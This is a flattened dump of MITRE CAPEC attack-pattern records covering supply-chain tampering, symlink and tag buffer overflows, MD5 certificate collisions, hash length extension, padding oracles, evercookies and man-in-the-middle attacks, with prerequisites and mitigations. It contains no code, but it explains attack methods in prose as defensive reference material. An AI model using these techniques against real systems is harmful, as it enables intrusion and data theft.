High
High
High
All
All
All
All
C
C++
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker modifies a technology, product, component, or sub-component during its deployed use at the victim location for the purpose of carrying out an attack. After deployment, it is not uncommon for upgrades and replacements to occur involving firmware, software, hardware, replaceable parts etc. These upgrades and replacements are intended to correct defects, provide additional features, replace broken or worn-out parts, and are considered an important part of the lifecycle of a deployed piece of technology. As the upgrade and replacement part of the lifecycle can involve multiple manufacturers and suppliers, subcontractors, and cross international boundaries, there are multiple points of disruption for the attacker.
A malicious subcontractor or subcontractor's employee that is responsible for providing replacement parts supplies a replacement hard drive with malicious code that will allow for backdoor access once deployed.
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker installs or add a malicious component into a product.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker inserts malicious logic into software at some point during the supply chain lifecycle, typically in the form of a traditional virus or trojan backdoor.
A USB Memory stick has malicious logic inserted before shipping of the product allowing for infection of the host machine once inserted into the USB port.
In 2007, approximately 1800 of Seagate's Maxtor Personal Storage 3200 drives were built under contract with an outside manufacturer and contained a virus that stole user passwords.
1000
Attack Pattern
ChildOf
438
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses their privileged position within an authorized software development organization to inject malicious logic into a codebase or product. Supply chain attacks from approved or trusted developers are extremely difficult to detect as it is generally assumed the quality control and internal security measures of these organizations conform to best practices. In some cases the malicious logic is intentional, embedded by a disgruntled employee, programmer, or individual with an otherwise hidden agenda. In other cases, the integrity of the product is compromised by accident (e.g. by lapse in the internal security of the organization that results in a product becoming contaminated). In other cases, the developer embeds a backdoor into a product to serve some purpose, such as product support, but discovery of the backdoor results in its malicious use by adversaries.
1000
Attack Pattern
ChildOf
442
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
442
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a configuration management system so that malicious logic is inserted into a software products build, update or deployed environment. If an attacker can control the elements included in a product's configuration management for build they can potentially replace, modify or insert code files containing malicious logic. If an attacker can control elements of a product's ongoing operational configuration management baseline they can potentially force clients receiving updates from the system to install insecure software when receiving updates from the server. Configuration management servers operate on the basis of a client pool, instructing each client on which software to install. In some cases the configuration management server will automate the software installation process. A malicious insider or an attacker who has compromised the server can alter the software baseline that clients must install, allowing the attacker to compromise a large number of satellite machines using the configuration management system. If an attacker can control elements of a product's configuration management for its deployed environment they can potentially alter fundamental security properties of the system based on assumptions that secure configurations are in place.
1000
Attack Pattern
ChildOf
444
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker conducts supply chain attacks by the inclusion of insecure 3rd party components into a technology, product, or code-base, possibly packaging a malicious driver or component along with the product before shipping it to the consumer or acquirer. The result is a window of opportunity for exploiting the product or software until the insecure component is discovered. This supply chain threat can result in the installation of software that introduces widespread security vulnerabilities within an organization. One example could be the inclusion of an exploitable DLL (Dynamic Link Library) included within an antivirus technology. Because software often depends upon a large number of interdependent libraries and components to be present, security holes can be introduced merely by installing COTS software that comes pre-packaged with the components required for it to operate.
1000
Attack Pattern
ChildOf
444
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates the codebase provided in a software patch, firmware version, or product update to contain malicious code. This results in devices, products, or software downloading and executing the attackers' code, or the code is introduced when the user updates the BIOS of a device. A malicious software update can perform any range of actions, depending on the attackers' intent. Of greatest concern are compromised updates that introduce logic bombs, deliberately hidden backdoors or rootkits, self-modifying code, keyloggers, or other means of gaining direct access to an organization's internal network.
1000
Attack Pattern
ChildOf
442
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker tampers with the code of a product and injects malicious logic into the device in order to infect any machine which interfaces with the product, and possibly steal private data or eavesdrop. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors becomes important vectors of attack.
1000
Attack Pattern
ChildOf
442
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker loads malicious code onto a USB memory stick in order to infect any supply chain-relevant machine which the device is plugged in to. This initially infected machine could then propagate the infection to products moving through the supply chain process. USB drives present a significant security risk for business and government agencies. Given the ability to integrate wireless functionality into a USB stick, it is possible to design malware that not only steals confidential data, but sniffs the network, or monitor keystrokes, and then exfiltrates the stolen data off-site via a Wireless connection. Also, viruses can be transmitted via the USB interface without the specific use of a memory stick. The attacks from USB devices are often of such sophistication that experts conclude they are not the work of single individuals, but suggest state sponsorship.
Access to the system containing the ATA Drive so that the drive can be physically removed from the system.
One example concerns digital picture frames manufactured in China. When the user plugs the picture frame into their computer via USB a worm is transmitted to their system.
1000
Attack Pattern
ChildOf
448
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
Marcus Sachs
Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization
Verizon, Inc.
Deborah Gage
Virus from China the gift that keeps on giving
San Francisco Chronicle
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
This type of attack leverages the use of symbolic links to cause buffer overflows. An attacker can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. When the target software processes the symbolic link file, it could potentially overflow internal buffers with insufficient bounds checking.
The attacker creates or modifies a symbolic link pointing to a resources (e.g., file, directory). The content of the symbolic link file includes out-of-bounds (e.g. excessive length) data.
The target host consumes the data pointed to by the symbolic link file. The target host may either intentionally expect to read a symbolic link or it may be fooled by the replacement of the original resource and read the attackers' symbolic link.
While consuming the data, the target host does not check for buffer boundary which can lead to a buffer overflow. If the content of the data is controlled by the attacker, this is an avenue for remote code execution.
The attacker can create symbolic link on the target host.
The target host does not perform correct boundary checking while consuming data from a resources.
High
High
Injection
Modification of Resources
Attack Example: Overflow with Symbolic Links in EFTP Server
The EFTP server has a buffer overflow that can be exploited if an attacker uploads a .lnk (link) file that contains more than 1,744 bytes. This is a classic example of an indirect buffer overflow. First the attacker uploads some content (the link file) and then the attacker causes the client consuming the data to be exploited. In this example, the ls command is exploited to compromise the server software.
Low
An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.
High
Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.
The attacker will look for temporary files in the world readable directories. Those temporary files are often created and read by the system.
The attacker will look for Symbolic link or link target file that she can override.
An attacker creating or modifying Symbolic links is a potential signal of attack in progress.
An attacker deleting temporary files can also be a sign that the attacker is trying to replace legitimate resources with malicious ones.
Pay attention to the fact that the resource you read from can be a replaced by a Symbolic link. You can do a Symlink check before reading the file and decide that this is not a legitimate way of accessing the resource.
Because Symlink can be modified by an attacker, make sure that the ones you read are located in protected directories.
Pay attention to the resource pointed to by your symlink links (See attack pattern named "Forced Symlink race"), they can be replaced by malicious resources.
Always check the size of the input data before copying to a buffer.
Use a language or compiler that performs automatic bounds checking.
Use an abstraction library to abstract away risky APIs. Not a complete solution.
Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.
Use OS-level preventative functionality. Not a complete solution.
Availability
DoS: crash / exit / restart
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Read memory
Integrity
Modify memory
The resource pointed to by the Symbolic link (e.g., file, directory, etc.)
The buffer overrun by the attacker.
When the function returns control to the main program, it jumps to the return address portion of the stack frame. Unfortunately that return address may have been overwritten by the overflowed buffer and the address may contain a call to a privileged command or to a malicious code.
The most common is remote code execution.
120
Targeted
285
Secondary
302
Targeted
118
Targeted
119
Targeted
74
Targeted
20
Targeted
680
Targeted
697
Targeted
1000
Attack Pattern
ChildOf
100
Reluctance to trust
Penetration
Exploitation
High
High
High
All
All
All
All
C
C++
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-119: Buffer Errors
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/119.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
449
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
448
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
441
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
452
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
Some level of physical access to the device being attacked.
1000
Attack Pattern
ChildOf
453
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker produces counterfeit hardware components which are included in product assembly during some portion of the supply chain lifecycle. The production of products containing counterfeit components such as counterfeit routers, switches, Ethernet, as well as WAN (Wide Area Networking) cards results in the acquirer obtaining a device specifically designed for malicious purposes. The problem of counterfeit hardware is not limited to small or "one-off" vendors, but has included major trusted suppliers, such as Cisco. There are billions of transistors in a single integrated circuit and researchers have shown that fewer than 10 transistors are required to create malicious functionality, such as keylogging or password theft.
The acquisition and use of hundreds of counterfeit devices by U.S. Naval Academy, the U.S. Naval Air Warfare Center, U.S. Naval Undersea Warfare Center, and U.S. Air Base at Spangdahelm, Germany has led to widespread fears of foreign espionage occurring in key centers of US military intelligence and logistics planning.
1000
Attack Pattern
ChildOf
453
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
Thea Reilkoff
Hardware Trojans: A Novel Attack Meets a New Defense
Yale School of Engineering and Applied Science
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
441
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
Some level of physical access to the device being attacked.
1000
Attack Pattern
ChildOf
456
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker inserts malicious logic into a product or technology via flashing the on-board memory with a code-base that contains malicious logic. Various attacks exist against the integrity of flash memory, the most direct being rootkits coded into the BIOS or chipset of a device. Such attacks are very difficult to detect because the malicious code resides outside the filesystem or RAM, and in the underlying byte-code that drives the processor. Many devices, such as the recent attacks against digital picture frames, contain only a microprocessor and a small amount of solid-state memory, rendering these devices ideal for "flash" based malware or malicious logic. One of the pernicious characteristics of flash memory based attacks is that the malicious code can survive even a total format of the hard-drive and reinstallation of the host operating system. Virtually any device which can be integrated into a computer system is susceptible to these attacks. Additionally, any peripheral device which interfaces with the computer bus could extract or sniff confidential data, even on systems employing full-disk encryption. Trojan code placed into a video card's chipset would continue to perform its function irrespective of the host operating system, and would be invisible to all known antivirus. The threats extend to consumer products such as camcorders, digital cameras, or any consumer electronic device with an embedded microcontroller.
1000
Attack Pattern
ChildOf
456
Information Technology Laboratory
Supply Chain Risk Management (SCRM)
National Institute of Standards and Technology (NIST)
2010
Robert Lemos
Researchers: Rootkits headed for BIOS
SecurityFocus
2006
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a weakness in the MD5 hash algorithm (weak collision resistance) to generate a certificate signing request (CSR) that contains collision blocks in the "to be signed" part. The attacker specially crafts two different, but valid X.509 certificates that when hashed with the MD5 algorithm would yield the same value. The attacker then sends the CSR for one of the certificates to the Certification Authority which uses the MD5 hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the attacker which is signed with its private key. An attacker then takes that signed blob and inserts it into another X.509 certificate that the attacker generated. Due to the MD5 collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate.
The net effect is that the attackers' second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority. To make the attack more interesting, the second certificate could be not just a regular certificate, but rather itself a signing certificate. Thus the attacker is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attackers' first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will now the Certificate Authority set up by the attacker and of course any certificates that it signs. So the attacker is now able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec) .
Certification Authority is using the MD5 hash function to generate the certificate hash to be signed
Very High
High
Understanding of how to force an MD5 hash collision in X.509 certificates
High
An attacker must be able to craft two X.509 certificates that produce the same MD5 hash
Medium
Knowledge needed to set up a certification authority
Certification Authorities need to stop using the weak collision prone MD5 hashing algorithm to hash the certificates that they are about to sign. Instead they should be using stronger hashing functions such as SHA-256 or SHA-512.
327
Targeted
295
Targeted
290
Targeted
1000
Attack Pattern
ChildOf
473
Alexander Sotirov
Marc Stevens
Jacob Appelbaum
Arjen Lenstra
David Molnar
Dag Arne Osvik
Benne de Weger
MD5 Considered Harmful Today: Creating a Rogue CA Certificate
Phreedom.org
2008-12-30
http://www.phreedom.org/research/rogue-ca/
CAPEC Content Team
The MITRE Corporation
2014-06-23
This type of attack leverages the use of tags or variables from a formatted configuration data to cause buffer overflow. The attacker crafts a malicious HTML page or configuration file that includes oversized strings, thus causing an overflow.
The attacker modifies a tag or variable from a formatted configuration data. For instance she changes it to an oversized string.
The target program consumes the data modified by the attacker without prior boundary checking. As a consequence, a buffer overflow occurs and at worst remote code execution may follow.
The target program consumes user-controllable data in the form of tags or variables.
The target program does not perform sufficient boundary checking.
High
High
Injection
Attack Example: Overflow Variables and Tags in MidiPlug
A buffer overflow vulnerability exists in the Yamaha MidiPlug that can be accessed via a Text variable found in an EMBED tag.
CVE-1999-0946
Attack Example: Overflow Variables and Tags in Exim
A buffer overflow in Exim allows local users to gain root privileges by providing a long :include: option in a .forward file.
CVE-1999-0971
Low
An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.
High
Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.
An attacker can modify the variables and tag exposed by the target program.
An attacker can automate the probing by input injection with script or automated tools.
Use a language or compiler that performs automatic bounds checking.
Use an abstraction library to abstract away risky APIs. Not a complete solution.
Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.
Use OS-level preventative functionality. Not a complete solution.
Do not trust input data from user. Validate all user input.
Availability
DoS: crash / exit / restart
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Read memory
Integrity
Modify memory
The variable or tag exposed to the user.
The new value of the variable or tag (could be an oversized string).
When the function returns control to the main program, it jumps to the return address portion of the stack frame. Unfortunately that return address may have been overwritten by the overflowed buffer and the address may contain a call to a privileged command or to a malicious code.
The most common is remote code execution.
120
Targeted
118
Targeted
119
Targeted
74
Targeted
20
Targeted
680
Targeted
733
Secondary
697
Targeted
1000
Attack Pattern
ChildOf
100
1000
Attack Pattern
PeerOf
8
1000
Attack Pattern
PeerOf
10
Reluctance to trust
Penetration
Exploitation
High
High
High
All
All
All
All
C
C++
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-119: Buffer Errors
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/119.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker overrides or adds HTTP GET/POST parameters by injecting query string delimiters. Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules.
HTTP protocol is used with some GET/POST parameters passed
Medium
Any tool that enables intercepting and tampering with HTTP requests
Configuration: If using a Web Application Firewall (WAF), filters should be carefully configured to detect abnormal HTTP requests
Design: Perform URL encoding
Implementation: Use strict regular expressions in URL rewriting
Implementation: Beware of multiple occurrences of a parameter in a Query String
88
Targeted
147
Targeted
235
Targeted
1000
Attack Pattern
ChildOf
15
Luca Carettoni
Stefano di Paola
HTTP Parameter Pollution
OWASP EU09 Poland
The Open Web Application Security Project (OWASP)
2008
https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
When web services require callees to authenticate, they sometimes issue a token / secret to the caller that the caller is to use to sign their web service calls. In one such scheme the caller when constructing a request would concatenate all of the parameters passed to the web service with the provided authentication token and then generate a hash of the concatenated string (e.g., MD5, SHA1, etc.). That hash then forms the signature that is passed to the web service which is used on the server side to verify the origin authenticity and integrity of the message. There is a practical attack against an authentication scheme of this nature that makes use of the hash function extension / padding weakness. Leveraging this weakness, an attacker, who does not know the secret token, is able to modify the parameters passed to the web service by generating their own call and still generate a legitimate signature hash. For instance, consider the message to be passed to the web service is M (this message includes the parameters passed to the web service concatenated with the secret token / key bytes). The message M is hashed and that hash is passed to the web service and is used for authentication. The attacker does not know M, but can see Hash (M) and Length (M). The attacker can then compute Hash (M || Padding (M) II M') for any M'. The attacker does not know the entire message M, specifically the attacker does not know the secret bytes, but that does not matter. The attacker is still able to sign their own message M' and make the called web service verify the integrity of the message without an error. Because of the iterative design of the hash function, it is possible, from only the hash of a message and its length, to compute the hash of longer messages that start with the initial message and include the padding required for the initial message to reach a multiple of 512 bits. It is important to note that the attack not limited to MD5 and will work just as well with another hash function like SHA1.
Web services check the signature of the API calls
Authentication tokens / secrets are shared between the server and the legitimate client
The API call signature is generated by concatenating the parameter list with the shared secret and hashing the result.
An iterative hash function like MD5 and SHA1 is used.
An attacker is able to intercept or in some other way gain access to the information passed between the legitimate client and the server in order to retrieve the hash value and length of the original message.
The communication channel between the client and the server is not secured via channel security such as TLS
High
Medium
Medium level of cryptography knowledge, specifically how iterative hash functions work. This is needed to select proper padding.
Access to a function to produce a hash (e.g., MD5, SHA1)
Tools that allow the attacker to intercept a message between the client and the server, specifically the hash that is the signature and the length of the original message concatenated with the secret bytes
Design: Use a secure message authentication code (MAC) function such as an HMAC-SHA1
328
Targeted
290
Targeted
1000
Attack Pattern
ChildOf
115
Thai Duong
Juliano Rizzo
Flickr's API Signature Forgery Vulnerability
September 28, 2009
http://netifera.com/research/flickr_api_signature_forgery.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain.
For GET requests an attacker could for instance leverage the "img" tag in conjunction with "onload() / onerror()" javascript events. For the POST requests, an attacker could leverage the "iframe" element and leverage the "onload()" event. There is nothing in the current browser security model that prevents an attacker to use these methods to time responses to the attackers' cross domain requests.
The timing for these responses leaks information. For instance, if a victim has an active session with their online e-mail account, an attacker could issue search requests in the victim's mailbox. While the attacker is not able to view the responses, based on the timings of the responses, the attacker could ask yes / no questions as to the content of victim's e-mails, who the victim e-mailed, when, etc. This is but one example; There are other scenarios where an attacker could infer potentially sensitive information from cross domain requests by timing the responses while asking the right questions that leak information.
Ability to issue GET / POST requests cross domain
Java Script is enabled in the victim's browser
The victim has an active session with the site from which the attacker would like to receive information
The victim's site does not protect search functionality with cross site request forgery (CSRF) protection
Medium
Low
Some knowledge of Java Script
Ability to issue GET / POST requests cross domain
Design: The victim's site could protect all potentially sensitive functionality (e.g. search functions) with cross site request forgery (CSRF) protection and not perform any work on behalf of forged requests
Design: The browser's security model could be fixed to not leak timing information for cross domain requests
385
Targeted
352
Secondary
208
Targeted
1000
Category
ChildOf
172
1000
Attack Pattern
ChildOf
116
Chris Evans
Cross-Domain Search Timing
December 11, 2009
http://scarybeastsecurity.blogspot.com/2009/12/cross-domain-search-timing.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an attacker is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an attacker is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.
Any cryptosystem can be vulnerable to padding oracle attacks if the encrypted messages are not authenticated to ensure their validity prior to decryption, and then the information about padding error is leaked to the attacker. This attack technique may be used, for instance, to break CAPTCHA systems or decrypt/modify state information stored in client side objects (e.g., hidden fields or cookies).
This attack technique is a side-channel attack on the cryptosystem that uses a data leak from an improperly implemented decryption routine to completely subvert the cryptosystem. The one bit of information that tells the attacker whether a padding error during decryption has occurred, in whatever form it comes, is sufficient for the attacker to break the cryptosystem. That bit of information can come in a form of an explicit error message about a padding error, a returned blank page, or even the server taking longer to respond (a timing attack).
This attack can be launched cross domain where an attacker is able to use cross-domain information leaks to get the bits of information from the padding oracle from a target system / service with which the victim is communicating. To do so an attacker sends a request containing ciphertext to the target system. Due to the browser's same origin policy, the attacker is not able to see the response directly, but can use cross-domain information leak techniques to still get the information needed (i.e., information on whether or not a padding error has occurred). For instance, this can be done using "img" tag plus the onerror()/onload() events. The attacker's JavaScript can make web browsers to load an image on the target site, and know if the image is loaded or not. This is 1-bit information needed for the padding oracle attack to work: if the image is loaded, then it is valid padding, otherwise it is not.
The decryption routine does not properly authenticate the message / does not verify its integrity prior to performing the decryption operation
The target system leaks data (in some way) on whether a padding error has occurred when attempting to decrypt the ciphertext.
The padding oracle remains available for enough time / for as many requests as needed for the attacker to decrypt the ciphertext.
High
Ability to detect instances where a target system is vulnerable to an oracle padding attack
Sufficient cryptography knowledge and tools needed to take advantage of the presence of the padding oracle to perform decryption / encryption of data without a key
Design: Use a message authentication code (MAC) or another mechanism to perform verification of message authenticity / integrity prior to decryption
Implementation: Do not leak information back to the user as to any cryptography (e.g., padding) encountered during decryption.
209
Targeted
514
Targeted
649
Targeted
347
Targeted
354
Targeted
696
Targeted
1000
Attack Pattern
ChildOf
97
Juliano Rizzo
Thai Duong
Practical Padding Oracle Attacks
May 25, 2010
http://usenix.org/events/woot10/tech/full_papers/Rizzo.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker creates a very persistent cookie that is then sent by the server to the victim's browser when the victim visits a website. The cookie is stored on the victim's machine in over ten places to include: Standard HTTP Cookies, Local Shared Objects (Flash Cookies), Silverlight Isolated Storage, Storing cookies in RGB values of auto-generated, force-cached, PNGs using HTML5 Canvas tag to read pixels (cookies) back out, Storing cookies in Web History, Storing cookies in HTTP ETags, Storing cookies in Web cache, window.name caching, Internet Explorer userData storage, HTML5 Session Storage, HTML5 Local Storage, HTML5 Global Storage, HTML5 Database Storage via SQLite, among others.
When the victim clears the cookie cache via traditional means inside the browser, that operation removes the cookie from certain places but not others. The malicious code then replicates the cookie from all of the places where it was not deleted to all of the possible storage locations once again. So the victim again has the cookie in all of the original storage locations. In other words, failure to delete the cookie in even one location will result in the cookie's resurrection everywhere. The evercookie will also persist across different browsers because certain stores (e.g., Local Shared Objects) are shared between different browsers.
The victim's browser is not configured to reject all cookies
The victim visits a website that serves the attackers' evercookie
Medium
Evercookie source code
Design: Browser's design needs to be changed to limit where cookies can be stored on the client side and provide an option to clear these cookies in all places, as well as another option to stop these cookies from being written in the first place.
Design: Safari browser's private browsing mode is currently effective against evercookies.
359
Targeted
1000
Attack Pattern
ChildOf
212
Samy Kamkar
Evercookie
September 9, 2010
http://samy.pl/evercookie/
CAPEC Content Team
The MITRE Corporation
2014-06-23
A transparent proxy serves as an intermediate between the client and the internet at large. It intercepts all requests originating from the client and forwards them to the correct location. The proxy also intercepts all responses to the client and forwards these to the client. All of this is done in a manner transparent to the client. Transparent proxies are often used by enterprises and ISPs.
For requests originating at the client transparent proxies need to figure out the final destination of the client's data packet. Two ways are available to do that: either by looking at the layer three (network) IP address or by examining layer seven (application) HTTP header destination.
A browser has same origin policy that typically prevents scripts coming from one domain initiating requests to other websites from which they did not come. To circumvent that, however, malicious Flash or an Applet that is executing in the user's browser can attempt to create a cross-domain socket connection from the client to the remote domain. The transparent proxy will examine the HTTP header of the request and direct it to the remote site thereby partially bypassing the browser's same origin policy. This can happen if the transparent proxy uses the HTTP host header information for addressing rather than the IP address information at the network layer. This attack allows malicious scripts inside the victim's browser to issue cross-domain requests to any hosts accessible to the transparent proxy.
Transparent proxy is used
Vulnerable configuration of network topology involving the transparent proxy (e.g., no NAT happening between the client and the proxy)
Execution of malicious Flash or Applet in the victim's browser
Medium
Medium
Creating malicious Flash or Applet to open a cross-domain socket connection to a remote system
Design: Ensure that the transparent proxy uses an actual network layer IP address for routing requests. On the transparent proxy, disable the use of routing based on address information in the HTTP host header.
Configuration: Disable in the browser the execution of Java Script, Flash, SilverLight, etc.
441
Targeted
1000
Category
ChildOf
210
Robert Auger
Socket Capable Browser Plugins Result In Transparent Proxy Abuse
2009
http://www.thesecuritypractice.com/the_security_practice/TransparentProxyAbuse.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker leverages a man in the middle attack in order to bypass the same origin policy protection in the victim's browser. This active man in the middle attack could be launched, for instance, when the victim is connected to a public WIFI hot spot. An attacker is able to intercept requests and responses between the victim's browser and some non-sensitive website that does not use TLS. For instance, the victim may be checking flight or weather information.
When an attacker intercepts a response bound to the victim, an attacker adds an iFrame (which is possibly invisible) to the response referencing some domain with sensitive functionality and forwards the response to the victim. The victim's browser than automatically initiates an unauthorized request to the site with sensitive functionality. The same origin policy would prevent making these requests to a site other than the one from which the Java Script came, but the attacker once again uses active man in the middle to intercept these automatic requests and redirect them to the domain / service with sensitive functionality. Any persistent cookies that the victim has in his or her browser would be used for these unauthorized requests. The attacker thus actively directs the victim to a site with sensitive functionality.
When the site with sensitive functionality responds back to the victim's request, an active man in the middle attacker intercepts these responses, injects his or her own malicious Java Script into these responses, and forwards to the victim's browser. In the victim's browser, that Java Script executes under the restrictions of the site with sensitive functionality and can essentially be used to continue to interact with the sensitive site. So an attacker can execute scripts within the victim's browser on any domains the attacker desires.
The attacker is able to use this technique to steal cookies from the victim's browser for whatever site the attacker wants. This applies to both persistent cookies and HTTP only cookies (unlike traditional XSS attacks).
An attacker is also able to use this technique to steal authentication credentials for sites that only encrypt the login form, but do not require a secure channel for the initial request to get to the page with the login form. Further the attacker is also able to steal any autocompletion information. This attack pattern can also be used to enable session fixation and cache poisoning attacks. Additional attacks can be enabled as well.
The victim and the attacker are both in an environment where an active man in the middle attack is possible (e.g., public WIFI hot spot)
The victim visits at least one website that does not use TLS / SSL
Medium
Low
Ability to intercept and modify requests / responses
Medium
Ability to create iFrame and JavaScript code that would initiate unauthorized requests to sensitive sites from the victim's browser
Medium
Solid understanding of the HTTP protocol
Design: Tunnel communications through a secure proxy
Design: Trust level separation for privileged / non privileged interactions (e.g., two different browsers, two different users, two different operating systems, two different virtual machines)
300
Targeted
1000
Attack Pattern
ChildOf
94
Roi Saltzman
Adi Sharabani
Active Man in the Middle Attacks
IBM Rational Application Security Group
February 2, 2009
http://blog.watchfire.com/wfblog/2009/02/active-man-in-the-middle-attacks.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker harvests identifying information about a victim via an active session that the victim's browser has with a social networking site. A victim may have the social networking site open in one tab or perhaps is simply using the "remember me" feature to keep his or her session with the social networking site active. An attacker induces a payload to execute in the victim's browser that transparently to the victim initiates a request to the social networking site (e.g., via available social network site APIs) to retrieve identifying information about a victim. While some of this information may be public, the attacker is able to harvest this information in context and may use it for further attacks on the user (e.g., spear phishing).
In one example of an attack, an attacker may post a malicious posting that contains an image with an embedded link. The link actually requests identifying information from the social networking site. A victim who views the malicious posting in his or her browser will have sent identifying information to the attacker, as long as the victim had an active session with the social networking site. There are many other ways in which the attacker may get the payload to execute in the victim's browser mainly by finding a way to hide it in some reputable site that the victim visits. The attacker could also send the link to the victim in an e-mail and trick the victim into clicking on the link.
This attack is basically a cross site request forgery attack with two main differences. First, there is no action that is performed on behalf of the user aside from harvesting information. So standard CSRF protection may not work in this situation. Second, what is important in this attack pattern is the nature of the data being harvested, which is identifying information that can be obtained and used in context. This real time harvesting of identifying information can be used as a prelude for launching real time targeted social engineering attacks on the victim.
The victim has an active session with the social networking site.
Low
High
An attacker should be able to create a payload and deliver it to the victim's browser.
Medium
An attacker needs to know how to interact with various social networking sites (e.g., via available APIs) to request information and how to send the harvested data back to the attacker.
Usage: Users should always explicitly log out from the social networking sites when done using them.
Usage: Users should not open other tabs in the browser when using a social networking site.
352
Targeted
359
Targeted
1000
Attack Pattern
ChildOf
62
1000
